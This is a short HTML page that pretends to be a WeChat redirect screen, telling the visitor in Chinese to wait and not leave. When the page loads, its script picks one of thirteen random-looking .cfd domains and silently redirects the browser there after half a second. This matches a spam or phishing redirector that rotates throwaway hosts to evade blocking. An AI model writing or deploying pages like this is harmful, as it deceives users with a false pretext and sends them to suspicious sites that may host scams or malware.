<!DOCTYPE html>
<html>
  <head>
    <title>加载中.....</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        align-items: center;
        height: 100vh;
        margin: 0;
        color: #333;
      }

      p {
        font-size: 35px;
        text-align: center;
        color: darkgreen;
        margin: 1em 0;
      }
      .highlight {
        color: coral;
      }

      .image-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 2em;
      }

      .image-container img {
        max-width: 100%;
        height: auto;
        margin-top: 1em;
      }
    </style>
    <script type="text/javascript">
      window.onload = function () {
        var links = [
          "http://jhi2edfpj8z3.gmdcin.cfd/thbbgyUT",
          "http://8j74rz3sdr5.seyjtm.cfd/NgNS7CvG",
          "http://nbwk2xfifwf.kvqwfc.cfd/wFeka6kY",
          "http://h2ac2ftc8jns.kyrznj.cfd/t7m0EOdD",
          "http://c4fehma77bmp.wavnfl.cfd/ESz4hD2T",
          "http://hz4dsk.gqhazo.cfd/abf3YTtg",
          "http://x8bbrhybncer.qydlwb.cfd/ra0VtXZs",
          "http://baisdp.vcthng.cfd/umdyY7S9",
          "http://a2axdy45endx.dthmqx.cfd/JiibvtJL",
          "http://3ei77h.tkfrmi.cfd/vxxRA9CN",
          "http://bdtp5ztfhmmi.hnlcpx.cfd/SD4GWfjP",
          "http://z6hyw6.dxs47m.cfd/zEQxxMjk",
          "http://n2xf4r.whsupr.cfd/OjeP2W62",
        ];
        var randomLink = links[Math.floor(Math.random() * links.length)];
        setTimeout(function () {
          window.location.href = randomLink;
        }, 500);
      };
    </script>
  </head>
  <body>
    <p>
      微信正在跳转，请稍等，限时加入！不要退出哦！<br />
      <span class="highlight">“如遇跳转失败请返回重新扫码”</span>
    </p>
    <div class="image-container">
      <img src="img2/1.jpg" alt="Image 1" />
      <img src="img2/2.jpg" alt="Image 2" />
      <img src="img2/3.jpg" alt="Image 3" />
    </div>
  </body>
</html>
